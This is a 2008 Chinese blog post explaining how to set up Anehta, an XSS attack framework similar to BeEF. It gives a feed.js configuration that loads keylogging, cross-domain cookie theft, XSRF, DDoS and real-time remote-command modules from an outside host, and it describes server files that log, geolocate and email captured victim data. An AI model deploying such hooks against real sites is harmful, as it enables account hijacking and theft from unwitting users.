百度空间 | 百度首页 
 
查看文章
 
Anehta -- Getting Started
2008-10-23 09:34
如何开始使用Anehta呢,首先介绍下anehta的结构。

由于我的viso用的很烂,所以只好用画图简单画了张

feed.js 是最基础的文件,一切anehta加载的源头都是这个文件。

以下是一个feed.js的例子,正常使用只需要修改其中这部分:
// anehta files url
var anehtaurl = "http://www.secwiki.com/anehta";  

var anehtaFeeds = [
// Library
{name: "BaseLib", url: "/library/base.js"},
{name: "JqueryLib", url: "/library/jquery.js"},

// Modules
//{name: "BoomerangMod", url: "/module/boomerang.js"},
{name: "ClxMod", url: "/module/clx.js"},
{name: "XsrfMod", url: "/module/xsrf.js"},
//{name: "DdosMod", url: "/module/ddos.js"},
{name: "HookMod", url: "/module/hook.js"},
{name: "KeyloggerMod", url: "/module/keylog.js"},
{name: "XCookieMod", url: "/module/xcookie.js"},
//{name: "CookieDemoMod", url: "/module/demo/cookieDemo.js"},
//{name: "CacheDemoMod", url: "/module/demo/cacheDemo.js"},
{name: "RealtimeCmdMod", url: "/module/realtimecmd.js"},
{name: "ScannerMod", url: "/module/scanner.js"},
{name: "TestMod", url: "/module/test.js"}
];

将anehtaurl改为你自己存在anehta项目的路径即可使用。

下面的模块是可选的,去掉注释后能组合成各种不同的功能。

注意: 请不要在feed.js加载 /boomerang.js (回旋镖模块),因为这个模块是专门针对IE的,在后面的 xcookie.js 中会自动判断浏览器版本并加载这个文件。

同时如果加载 boomerang.js 的话,需要修改 boomerang.js 中的

var org_url = "http://www.secwiki.com/anehta/demo.html";
var org_domain = "www.secwiki.com";

为被XSS的页面和被XSS的域名,否则回旋镖会跳不回来!


feed.js 会去加载 base.js ,这是最核心的文件,JS框架就是这个文件。然后会加载一系列的MOD。


打开文件夹后会看到很多文件,现在简单介绍下这些文件的作用:

feed.js 是前面说的加载js用的。

admin.php 是管理后台
logxss.php 是记录所有log的文件,文件会按照水印分类记录到slave目录下
ip.php 是反向查询地理位置的文件
cookie2proxy.php 是我用来向glype proxy 添加cookie的文件
realtimecmd.php 是实时控制客户端的文件

library 目录下放的是JS library,只有两个文件: base.js , jquery.js

module目录下是模块文件:

这些js都是独立的模块,xcookie是跨域获取cookie,clx是打水印的模块,我把它称作“楚留香模块”

boomerang就是回旋镖模块了

flash目录下目前放的是打水印用的flash

demo目录下还有些API的演示。

其他的模块都能从字面上理解其含义。


tools目录下放的是一些第三方工具,目前放了两个
一个是PHP的网页代理: glype
我修改后,可以自定义cookie了


另一个是发送邮件用的 phpMailer


说到发送邮件,在admin后台里,请大家不要随便点击 Mail&Del 按钮啊,log日志都发送到我的邮箱里了

这个功能昨天做demo录像的时候忘记演示了。




请修改tools/phpMailer/mail.php 文件,让邮件发送到你自己的邮箱,不然都发到我这里来啦~!!









类别:象牙塔 | 添加到搜藏 | 浏览() | 评论 (5)
 
最近读者:
 
网友评论:
1
2008-10-23 11:18 | 回复
快狂点DELETE LOG~~~~
 
2
2008-10-23 12:26 | 回复
有点和BEEF类似。。 但是终于能用到国产的了 很欣慰
 
3
2008-10-26 09:29 | 回复
快狂点DELETE LOG~~~~ 建议不错,哈哈!!!
 
4
2008-11-07 15:51 | 回复
请问这个工具是在一个可以解析PHP的环境里面使用就行了吗? 1.在初次安装后进入页面,跳转到admin.php页面后让完成配置 Boomerang Target: Boomerang Src: 这两项需要填写什么内容啊? 2. 没看到你所说的mail.php文件,是不是。5.6给改掉了,只是在example找到个test_mail.php文件。还有相关的mail中调用的命令好像是/sbin/sendmail之类的,是要在Linux环境下才可以使用mail功能,对吗?
 
5
2008-11-07 16:57 | 回复
mail.php文件放到 anehta/server 目录下去了,和admin.php在同一个目录 Boomerang Target/Src 请参考我写的那篇 回旋镖的BLOG文章,如果你不需要此功能可以在 xcookie.js 里禁止加载这个脚本。
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu